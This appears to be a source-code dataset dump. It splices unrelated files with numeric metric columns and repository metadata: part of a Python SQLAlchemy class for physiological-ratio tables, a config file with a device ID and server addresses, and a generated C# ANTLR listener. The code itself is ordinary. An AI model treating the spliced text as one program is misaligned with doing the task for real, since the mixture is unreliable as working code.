except SQLAlchemyError as e:
print(e);
def get_sampleNameAbbreviations_experimentIDAndTimePointAndRatioID_dataStage01PhysiologicalRatiosAverages(self,experiment_id_I,time_point_I,physiologicalratio_id_I):
'''Querry sample names (i.e. unknowns) that are used from
the experiment'''
try:
sample_names = self.session.query(data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_averages.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation).order_by(
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation.asc()).all();
sample_names_O = [];
for sn in sample_names: sample_names_O.append(sn.sample_name_abbreviation);
return sample_names_O;
except SQLAlchemyError as e:
print(e);
# Query data from data_stage01_quantification_physiologicalRatios_averages:
def get_data_experimentIDAndTimePointAndSampleNameAbbreviation_dataStage01PhysiologicalRatiosAverages(self, experiment_id_I,time_point_I,sample_name_abbreviation_I):
"""get data from experiment ID"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_averages).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).all();
data_O = [];
for d in data:
data_1 = {'experiment_id':d.experiment_id,
'sample_name_abbreviation':d.sample_name_abbreviation,
'time_point':d.time_point,
'physiologicalratio_id':d.physiologicalratio_id,
'physiologicalratio_name':d.physiologicalratio_name,
'physiologicalratio_value_ave':d.physiologicalratio_value_ave,
'physiologicalratio_value_cv':d.physiologicalratio_value_cv,
'physiologicalratio_value_lb':d.physiologicalratio_value_lb,
'physiologicalratio_value_ub':d.physiologicalratio_value_ub,
'physiologicalratio_description':d.physiologicalratio_description,
'used_':d.used_,
'comment_':d.comment_};
data_O.append(data_1);
return data_O;
except SQLAlchemyError as e:
print(e);
def get_data_experimentIDAndTimePointAndRatioIDAndSampleNameAbbreviation_dataStage01PhysiologicalRatiosAverages(self, experiment_id_I,time_point_I,physiologicalratio_id_I,sample_name_abbreviation_I):
"""get data from experiment ID"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_averages).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_averages.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).all();
data_O = {};
if data:
data_O = {'experiment_id':data[0].experiment_id,
'sample_name_abbreviation':data[0].sample_name_abbreviation,
'time_point':data[0].time_point,
'physiologicalratio_id':data[0].physiologicalratio_id,
'physiologicalratio_name':data[0].physiologicalratio_name,
'physiologicalratio_value_ave':data[0].physiologicalratio_value_ave,
'physiologicalratio_value_cv':data[0].physiologicalratio_value_cv,
'physiologicalratio_value_lb':data[0].physiologicalratio_value_lb,
'physiologicalratio_value_ub':data[0].physiologicalratio_value_ub,
'physiologicalratio_description':data[0].physiologicalratio_description,
'used_':data[0].used_,
'comment_':data[0].comment_};
return data_O;
except SQLAlchemyError as e:
print(e);
def get_ratio_experimentIDAndTimePointAndRatioIDAndSampleNameAbbreviation_dataStage01PhysiologicalRatiosAverages(self, experiment_id_I,time_point_I,physiologicalratio_id_I,sample_name_abbreviation_I):
"""get data from experiment ID"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_averages).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_averages.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).all();
ratio_O = None;
if data:
ratio_O = data[0].physiologicalratio_value_ave;
return ratio_O;
except SQLAlchemyError as e:
print(e);
def drop_dataStage01_quantification_physiologicalRatios(self):
try:
data_stage01_quantification_physiologicalRatios_replicates.__table__.drop(self.engine,True);
data_stage01_quantification_physiologicalRatios_averages.__table__.drop(self.engine,True);
except SQLAlchemyError as e:
print(e);
def initialize_dataStage01_quantification_physiologicalRatios(self):
try:
data_stage01_quantification_physiologicalRatios_replicates.__table__.create(self.engine,True);
data_stage01_quantification_physiologicalRatios_averages.__table__.create(self.engine,True);
except SQLAlchemyError as e:
print(e);
def reset_dataStage01_quantification_physiologicalRatios(self,experiment_id_I):
try:
if experiment_id_I:
reset = self.session.query(data_stage01_quantification_physiologicalRatios_replicates).filter(data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
reset = self.session.query(data_stage01_quantification_physiologicalRatios_averages).filter(data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
self.session.commit();
except SQLAlchemyError as e:
print(e);
def add_dataStage01QuantificationPhysiologicalRatiosReplicates(self, data_I):
'''add rows of data_stage01_quantification_physiologicalRatios_replicates'''
if data_I:
for d in data_I:
try:
data_add = data_stage01_quantification_physiologicalRatios_replicates(d
#d['experiment_id_I'],
#d['sample_name_short_I'],
##d['sample_name_abbreviation_I'],
#d['time_point_I'],
##d['time_point_units_I'],
#d['physiologicalratio_id_I'],
#d['physiologicalratio_name_I'],
#d['physiologicalratio_value_I'],
#d['physiologicalratio_description_I'],
#d['used__I'],
#d['comment__I']
);
self.session.add(data_add);
except SQLAlchemyError as e:
print(e);
self.session.commit();
def update_dataStage01QuantificationPhysiologicalRatiosReplicates(self,data_I):
'''update rows of data_stage02_quantification_lineage'''
if data_I:
for d in data_I:
try:
data_update = self.session.query(data_stage01_quantification_physiologicalRatios_replicates).filter(
data_stage01_quantification_physiologicalRatios_replicates.id==d['id']).update(
{'experiment_id_I':d['experiment_id_I'],
'sample_name_short_I':d['sample_name_short_I'],
#'sample_name_abbreviation_I':d['#sample_name_abbreviation_I'],
'time_point_I':d['time_point_I'],
#'time_point_units_I':d['#time_point_units_I'],
'physiologicalratio_id_I':d['physiologicalratio_id_I'],
'physiologicalratio_name_I':d['physiologicalratio_name_I'],
'physiologicalratio_value_I':d['physiologicalratio_value_I'],
'physiologicalratio_description_I':d['physiologicalratio_description_I'],
'used__I':d['used__I'],
'comment__I':d['comment__I']},
synchronize_session=False);
except SQLAlchemyError as e:
print(e);
self.session.commit(); | 72.186916 | 240 | 0.706564 | 3,008 | 30,896 | 6.76762 | 0.04488 | 0.217223 | 0.257405 | 0.278823 | 0.898757 | 0.844673 | 0.803557 | 0.787395 | 0.757184 | 0.726089 | 0 | 0.014268 | 0.230968 | 30,896 | 428 | 241 | 72.186916 | 0.842466 | 0.030845 | 0 | 0.723404 | 0 | 0 | 0.046571 | 0.033439 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.026596 | null | null | 0.06117 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
78a4a1fcb0ce081ef1e90451c386408cafe364a8 | 29 | py | Python | rasp_car_PCA9685/__init__.py | IsmoilovMuhriddin/Adafruit_Python_PCA9685 | 63f56ed65d13110e832e05da7f9093b3ceda0119 | [
"MIT"
] | null | null | null | rasp_car_PCA9685/__init__.py | IsmoilovMuhriddin/Adafruit_Python_PCA9685 | 63f56ed65d13110e832e05da7f9093b3ceda0119 | [
"MIT"
] | null | null | null | rasp_car_PCA9685/__init__.py | IsmoilovMuhriddin/Adafruit_Python_PCA9685 | 63f56ed65d13110e832e05da7f9093b3ceda0119 | [
"MIT"
] | null | null | null | from .PCA9685 import PCA9685
| 14.5 | 28 | 0.827586 | 4 | 29 | 6 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.32 | 0.137931 | 29 | 1 | 29 | 29 | 0.64 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
78cf3f51a6f8cd0414a75e0099bad6942ee643f0 | 92 | py | Python | Cluster member/meta_data.py | wanglabmccc/iiot_project | cd7cc4c9b888d8c74092dac01a5f1ab4648f91ad | [
"MIT"
] | null | null | null | Cluster member/meta_data.py | wanglabmccc/iiot_project | cd7cc4c9b888d8c74092dac01a5f1ab4648f91ad | [
"MIT"
] | null | null | null | Cluster member/meta_data.py | wanglabmccc/iiot_project | cd7cc4c9b888d8c74092dac01a5f1ab4648f91ad | [
"MIT"
] | null | null | null | DEVICE_ID = "sta04"
IIOT_SERVER_ADDR = "140.113.179.7"
NTP_SERVER_ADDR = "140.113.179.7"
| 23 | 35 | 0.706522 | 17 | 92 | 3.529412 | 0.647059 | 0.333333 | 0.433333 | 0.533333 | 0.666667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0.275 | 0.130435 | 92 | 3 | 36 | 30.666667 | 0.475 | 0 | 0 | 0 | 0 | 0 | 0.348315 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
151f9eb29e0121ccd75fdf8a36a6c49c55a08377 | 141,751 | py | Python | src/pyensae/languages/CSharp4Listener.py | mohamedelkansouli/Ensae_py2 | e54a05f90c6aa6e2a5065eac9f9ec10aca64b46a | [
"MIT"
] | null | null | null | src/pyensae/languages/CSharp4Listener.py | mohamedelkansouli/Ensae_py2 | e54a05f90c6aa6e2a5065eac9f9ec10aca64b46a | [
"MIT"
] | null | null | null | src/pyensae/languages/CSharp4Listener.py | mohamedelkansouli/Ensae_py2 | e54a05f90c6aa6e2a5065eac9f9ec10aca64b46a | [
"MIT"
] | null | null | null | # Generated from \CSharp4.g4 by ANTLR 4.7
from antlr4 import *
if __name__ is not None and "." in __name__:
from .CSharp4Parser import CSharp4Parser
else:
from CSharp4Parser import CSharp4Parser
# This class defines a complete listener for a parse tree produced by CSharp4Parser.
class CSharp4Listener(ParseTreeListener):
# Enter a parse tree produced by CSharp4Parser#namespace_name.
def enterNamespace_name(self, ctx: CSharp4Parser.Namespace_nameContext):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_name.
def exitNamespace_name(self, ctx: CSharp4Parser.Namespace_nameContext):
pass
# Enter a parse tree produced by CSharp4Parser#type_name.
def enterType_name(self, ctx: CSharp4Parser.Type_nameContext):
pass
# Exit a parse tree produced by CSharp4Parser#type_name.
def exitType_name(self, ctx: CSharp4Parser.Type_nameContext):
pass
# Enter a parse tree produced by CSharp4Parser#identifier.
def enterIdentifier(self, ctx: CSharp4Parser.IdentifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#identifier.
def exitIdentifier(self, ctx: CSharp4Parser.IdentifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#namespace_or_type_name.
def enterNamespace_or_type_name(self, ctx: CSharp4Parser.Namespace_or_type_nameContext):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_or_type_name.
def exitNamespace_or_type_name(self, ctx: CSharp4Parser.Namespace_or_type_nameContext):
pass
# Enter a parse tree produced by CSharp4Parser#type_argument_list_opt.
def enterType_argument_list_opt(self, ctx: CSharp4Parser.Type_argument_list_optContext):
pass
# Exit a parse tree produced by CSharp4Parser#type_argument_list_opt.
def exitType_argument_list_opt(self, ctx: CSharp4Parser.Type_argument_list_optContext):
pass
# Enter a parse tree produced by CSharp4Parser#any_type.
def enterAny_type(self, ctx: CSharp4Parser.Any_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#any_type.
def exitAny_type(self, ctx: CSharp4Parser.Any_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#base_type.
def enterBase_type(self, ctx: CSharp4Parser.Base_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#base_type.
def exitBase_type(self, ctx: CSharp4Parser.Base_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#simple_type.
def enterSimple_type(self, ctx: CSharp4Parser.Simple_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#simple_type.
def exitSimple_type(self, ctx: CSharp4Parser.Simple_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#numeric_type.
def enterNumeric_type(self, ctx: CSharp4Parser.Numeric_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#numeric_type.
def exitNumeric_type(self, ctx: CSharp4Parser.Numeric_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#integral_type.
def enterIntegral_type(self, ctx: CSharp4Parser.Integral_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#integral_type.
def exitIntegral_type(self, ctx: CSharp4Parser.Integral_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#floating_point_type.
def enterFloating_point_type(self, ctx: CSharp4Parser.Floating_point_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#floating_point_type.
def exitFloating_point_type(self, ctx: CSharp4Parser.Floating_point_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#nullable_type.
def enterNullable_type(self, ctx: CSharp4Parser.Nullable_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#nullable_type.
def exitNullable_type(self, ctx: CSharp4Parser.Nullable_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#non_nullable_value_type.
def enterNon_nullable_value_type(self, ctx: CSharp4Parser.Non_nullable_value_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#non_nullable_value_type.
def exitNon_nullable_value_type(self, ctx: CSharp4Parser.Non_nullable_value_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#reference_type.
def enterReference_type(self, ctx: CSharp4Parser.Reference_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#reference_type.
def exitReference_type(self, ctx: CSharp4Parser.Reference_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#class_type.
def enterClass_type(self, ctx: CSharp4Parser.Class_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#class_type.
def exitClass_type(self, ctx: CSharp4Parser.Class_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_type.
def enterInterface_type(self, ctx: CSharp4Parser.Interface_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_type.
def exitInterface_type(self, ctx: CSharp4Parser.Interface_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#delegate_type.
def enterDelegate_type(self, ctx: CSharp4Parser.Delegate_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#delegate_type.
def exitDelegate_type(self, ctx: CSharp4Parser.Delegate_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#type_argument_list.
def enterType_argument_list(self, ctx: CSharp4Parser.Type_argument_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#type_argument_list.
def exitType_argument_list(self, ctx: CSharp4Parser.Type_argument_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#type_arguments.
def enterType_arguments(self, ctx: CSharp4Parser.Type_argumentsContext):
pass
# Exit a parse tree produced by CSharp4Parser#type_arguments.
def exitType_arguments(self, ctx: CSharp4Parser.Type_argumentsContext):
pass
# Enter a parse tree produced by CSharp4Parser#type_argument.
def enterType_argument(self, ctx: CSharp4Parser.Type_argumentContext):
pass
# Exit a parse tree produced by CSharp4Parser#type_argument.
def exitType_argument(self, ctx: CSharp4Parser.Type_argumentContext):
pass
# Enter a parse tree produced by CSharp4Parser#type_void.
def enterType_void(self, ctx: CSharp4Parser.Type_voidContext):
pass
# Exit a parse tree produced by CSharp4Parser#type_void.
def exitType_void(self, ctx: CSharp4Parser.Type_voidContext):
pass
# Enter a parse tree produced by CSharp4Parser#variable_reference.
def enterVariable_reference(self, ctx: CSharp4Parser.Variable_referenceContext):
pass
# Exit a parse tree produced by CSharp4Parser#variable_reference.
def exitVariable_reference(self, ctx: CSharp4Parser.Variable_referenceContext):
pass
# Enter a parse tree produced by CSharp4Parser#argument_list.
def enterArgument_list(self, ctx: CSharp4Parser.Argument_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#argument_list.
def exitArgument_list(self, ctx: CSharp4Parser.Argument_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#argument.
def enterArgument(self, ctx: CSharp4Parser.ArgumentContext):
pass
# Exit a parse tree produced by CSharp4Parser#argument.
def exitArgument(self, ctx: CSharp4Parser.ArgumentContext):
pass
# Enter a parse tree produced by CSharp4Parser#argument_name.
def enterArgument_name(self, ctx: CSharp4Parser.Argument_nameContext):
pass
# Exit a parse tree produced by CSharp4Parser#argument_name.
def exitArgument_name(self, ctx: CSharp4Parser.Argument_nameContext):
pass
# Enter a parse tree produced by CSharp4Parser#argument_value.
def enterArgument_value(self, ctx: CSharp4Parser.Argument_valueContext):
pass
# Exit a parse tree produced by CSharp4Parser#argument_value.
def exitArgument_value(self, ctx: CSharp4Parser.Argument_valueContext):
pass
# Enter a parse tree produced by CSharp4Parser#primary_expression.
def enterPrimary_expression(self, ctx: CSharp4Parser.Primary_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#primary_expression.
def exitPrimary_expression(self, ctx: CSharp4Parser.Primary_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#primary_expression_start.
def enterPrimary_expression_start(self, ctx: CSharp4Parser.Primary_expression_startContext):
pass
# Exit a parse tree produced by CSharp4Parser#primary_expression_start.
def exitPrimary_expression_start(self, ctx: CSharp4Parser.Primary_expression_startContext):
pass
# Enter a parse tree produced by CSharp4Parser#bracket_expression.
def enterBracket_expression(self, ctx: CSharp4Parser.Bracket_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#bracket_expression.
def exitBracket_expression(self, ctx: CSharp4Parser.Bracket_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#simple_name.
def enterSimple_name(self, ctx: CSharp4Parser.Simple_nameContext):
pass
# Exit a parse tree produced by CSharp4Parser#simple_name.
def exitSimple_name(self, ctx: CSharp4Parser.Simple_nameContext):
pass
# Enter a parse tree produced by CSharp4Parser#parenthesized_expression.
def enterParenthesized_expression(self, ctx: CSharp4Parser.Parenthesized_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#parenthesized_expression.
def exitParenthesized_expression(self, ctx: CSharp4Parser.Parenthesized_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#member_access.
def enterMember_access(self, ctx: CSharp4Parser.Member_accessContext):
pass
# Exit a parse tree produced by CSharp4Parser#member_access.
def exitMember_access(self, ctx: CSharp4Parser.Member_accessContext):
pass
# Enter a parse tree produced by CSharp4Parser#predefined_type.
def enterPredefined_type(self, ctx: CSharp4Parser.Predefined_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#predefined_type.
def exitPredefined_type(self, ctx: CSharp4Parser.Predefined_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#expression_list.
def enterExpression_list(self, ctx: CSharp4Parser.Expression_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#expression_list.
def exitExpression_list(self, ctx: CSharp4Parser.Expression_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#this_access.
def enterThis_access(self, ctx: CSharp4Parser.This_accessContext):
pass
# Exit a parse tree produced by CSharp4Parser#this_access.
def exitThis_access(self, ctx: CSharp4Parser.This_accessContext):
pass
# Enter a parse tree produced by CSharp4Parser#base_access.
def enterBase_access(self, ctx: CSharp4Parser.Base_accessContext):
pass
# Exit a parse tree produced by CSharp4Parser#base_access.
def exitBase_access(self, ctx: CSharp4Parser.Base_accessContext):
pass
# Enter a parse tree produced by CSharp4Parser#object_creation_expression.
def enterObject_creation_expression(self, ctx: CSharp4Parser.Object_creation_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#object_creation_expression.
def exitObject_creation_expression(self, ctx: CSharp4Parser.Object_creation_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#object_or_collection_initializer.
def enterObject_or_collection_initializer(self, ctx: CSharp4Parser.Object_or_collection_initializerContext):
pass
# Exit a parse tree produced by CSharp4Parser#object_or_collection_initializer.
def exitObject_or_collection_initializer(self, ctx: CSharp4Parser.Object_or_collection_initializerContext):
pass
# Enter a parse tree produced by CSharp4Parser#object_initializer.
def enterObject_initializer(self, ctx: CSharp4Parser.Object_initializerContext):
pass
# Exit a parse tree produced by CSharp4Parser#object_initializer.
def exitObject_initializer(self, ctx: CSharp4Parser.Object_initializerContext):
pass
# Enter a parse tree produced by CSharp4Parser#member_initializer_list.
def enterMember_initializer_list(self, ctx: CSharp4Parser.Member_initializer_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#member_initializer_list.
def exitMember_initializer_list(self, ctx: CSharp4Parser.Member_initializer_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#member_initializer.
def enterMember_initializer(self, ctx: CSharp4Parser.Member_initializerContext):
pass
# Exit a parse tree produced by CSharp4Parser#member_initializer.
def exitMember_initializer(self, ctx: CSharp4Parser.Member_initializerContext):
pass
# Enter a parse tree produced by CSharp4Parser#initializer_value.
def enterInitializer_value(self, ctx: CSharp4Parser.Initializer_valueContext):
pass
# Exit a parse tree produced by CSharp4Parser#initializer_value.
def exitInitializer_value(self, ctx: CSharp4Parser.Initializer_valueContext):
pass
# Enter a parse tree produced by CSharp4Parser#collection_initializer.
def enterCollection_initializer(self, ctx: CSharp4Parser.Collection_initializerContext):
pass
# Exit a parse tree produced by CSharp4Parser#collection_initializer.
def exitCollection_initializer(self, ctx: CSharp4Parser.Collection_initializerContext):
pass
# Enter a parse tree produced by CSharp4Parser#element_initializer_list.
def enterElement_initializer_list(self, ctx: CSharp4Parser.Element_initializer_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#element_initializer_list.
def exitElement_initializer_list(self, ctx: CSharp4Parser.Element_initializer_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#element_initializer.
def enterElement_initializer(self, ctx: CSharp4Parser.Element_initializerContext):
pass
# Exit a parse tree produced by CSharp4Parser#element_initializer.
def exitElement_initializer(self, ctx: CSharp4Parser.Element_initializerContext):
pass
# Enter a parse tree produced by CSharp4Parser#array_creation_expression.
def enterArray_creation_expression(self, ctx: CSharp4Parser.Array_creation_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#array_creation_expression.
def exitArray_creation_expression(self, ctx: CSharp4Parser.Array_creation_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#delegate_creation_expression.
def enterDelegate_creation_expression(self, ctx: CSharp4Parser.Delegate_creation_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#delegate_creation_expression.
def exitDelegate_creation_expression(self, ctx: CSharp4Parser.Delegate_creation_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#anonymous_object_creation_expression.
def enterAnonymous_object_creation_expression(self, ctx: CSharp4Parser.Anonymous_object_creation_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#anonymous_object_creation_expression.
def exitAnonymous_object_creation_expression(self, ctx: CSharp4Parser.Anonymous_object_creation_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#anonymous_object_initializer.
def enterAnonymous_object_initializer(self, ctx: CSharp4Parser.Anonymous_object_initializerContext):
pass
# Exit a parse tree produced by CSharp4Parser#anonymous_object_initializer.
def exitAnonymous_object_initializer(self, ctx: CSharp4Parser.Anonymous_object_initializerContext):
pass
# Enter a parse tree produced by CSharp4Parser#member_declarator_list.
def enterMember_declarator_list(self, ctx: CSharp4Parser.Member_declarator_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#member_declarator_list.
def exitMember_declarator_list(self, ctx: CSharp4Parser.Member_declarator_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#member_declarator.
def enterMember_declarator(self, ctx: CSharp4Parser.Member_declaratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#member_declarator.
def exitMember_declarator(self, ctx: CSharp4Parser.Member_declaratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#typeof_expression.
def enterTypeof_expression(self, ctx: CSharp4Parser.Typeof_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#typeof_expression.
def exitTypeof_expression(self, ctx: CSharp4Parser.Typeof_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#unbound_type_name.
def enterUnbound_type_name(self, ctx: CSharp4Parser.Unbound_type_nameContext):
pass
# Exit a parse tree produced by CSharp4Parser#unbound_type_name.
def exitUnbound_type_name(self, ctx: CSharp4Parser.Unbound_type_nameContext):
pass
# Enter a parse tree produced by CSharp4Parser#generic_dimension_specifier.
def enterGeneric_dimension_specifier(self, ctx: CSharp4Parser.Generic_dimension_specifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#generic_dimension_specifier.
def exitGeneric_dimension_specifier(self, ctx: CSharp4Parser.Generic_dimension_specifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#commas.
def enterCommas(self, ctx: CSharp4Parser.CommasContext):
pass
# Exit a parse tree produced by CSharp4Parser#commas.
def exitCommas(self, ctx: CSharp4Parser.CommasContext):
pass
# Enter a parse tree produced by CSharp4Parser#checked_expression.
def enterChecked_expression(self, ctx: CSharp4Parser.Checked_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#checked_expression.
def exitChecked_expression(self, ctx: CSharp4Parser.Checked_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#unchecked_expression.
def enterUnchecked_expression(self, ctx: CSharp4Parser.Unchecked_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#unchecked_expression.
def exitUnchecked_expression(self, ctx: CSharp4Parser.Unchecked_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#default_value_expression.
def enterDefault_value_expression(self, ctx: CSharp4Parser.Default_value_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#default_value_expression.
def exitDefault_value_expression(self, ctx: CSharp4Parser.Default_value_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#unary_expression.
def enterUnary_expression(self, ctx: CSharp4Parser.Unary_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#unary_expression.
def exitUnary_expression(self, ctx: CSharp4Parser.Unary_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#scan_for_cast_generic_precedence.
def enterScan_for_cast_generic_precedence(self, ctx: CSharp4Parser.Scan_for_cast_generic_precedenceContext):
pass
# Exit a parse tree produced by CSharp4Parser#scan_for_cast_generic_precedence.
def exitScan_for_cast_generic_precedence(self, ctx: CSharp4Parser.Scan_for_cast_generic_precedenceContext):
pass
# Enter a parse tree produced by CSharp4Parser#cast_disambiguation_token.
def enterCast_disambiguation_token(self, ctx: CSharp4Parser.Cast_disambiguation_tokenContext):
pass
# Exit a parse tree produced by CSharp4Parser#cast_disambiguation_token.
def exitCast_disambiguation_token(self, ctx: CSharp4Parser.Cast_disambiguation_tokenContext):
pass
# Enter a parse tree produced by CSharp4Parser#pre_increment_expression.
def enterPre_increment_expression(self, ctx: CSharp4Parser.Pre_increment_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#pre_increment_expression.
def exitPre_increment_expression(self, ctx: CSharp4Parser.Pre_increment_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#pre_decrement_expression.
def enterPre_decrement_expression(self, ctx: CSharp4Parser.Pre_decrement_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#pre_decrement_expression.
def exitPre_decrement_expression(self, ctx: CSharp4Parser.Pre_decrement_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#cast_expression.
def enterCast_expression(self, ctx: CSharp4Parser.Cast_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#cast_expression.
def exitCast_expression(self, ctx: CSharp4Parser.Cast_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#multiplicative_expression.
def enterMultiplicative_expression(self, ctx: CSharp4Parser.Multiplicative_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#multiplicative_expression.
def exitMultiplicative_expression(self, ctx: CSharp4Parser.Multiplicative_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#additive_expression.
def enterAdditive_expression(self, ctx: CSharp4Parser.Additive_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#additive_expression.
def exitAdditive_expression(self, ctx: CSharp4Parser.Additive_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#shift_expression.
def enterShift_expression(self, ctx: CSharp4Parser.Shift_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#shift_expression.
def exitShift_expression(self, ctx: CSharp4Parser.Shift_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#relational_expression.
